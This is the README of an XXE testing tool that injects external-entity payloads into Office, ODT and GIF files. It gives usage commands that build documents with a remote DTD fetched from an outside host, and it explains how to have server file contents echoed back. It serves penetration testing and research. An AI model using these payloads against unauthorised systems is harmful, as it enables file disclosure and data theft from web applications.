This tool is meant to help test XXE vulnerabilities in OXML document file formats. Currently supported:
- DOCX/XLSX/PPTX
- ODT
- GIF (experimental)
BH USA 2015 Presentation:
Exploiting XXE in File Upload Functionality
Blog Posts on the topic:
Exploiting XXE Vulnerabilities in OXML Documents - Part 1
Installation is easy, you will need a copy of Ruby and two gems.
gem install highline
gem install zipruby
or
gem install bundler
bundle install
ruby oxml_xxe.rb --poc pdf -i 192.168.14.1:8000
ruby oxml_xxe.rb -s -i 192.168.14.1:8000
Select payload 11 ("remote_DTD")
ruby oxml_xxe.rb -f samples/sample.xlsx -s -i 192.168.14.1:8000
Select payload 11 ("remote_DTD")
There are two main modes:
Build mode adds a DOCTYPE and inserts the XML Entity into the file of the users choice.
String replacement mode goes through and looks for the symbol § in the document. The XML Entity ("&xxe;") replaces any instances of this symbol. Note, you can open the document in and insert § anywhere to have it replaced. The common use case would be a web application which reads in a xlsx and then prints the results to the screen. Exploiting the XXE it would be possible to have the contents printed to the screen.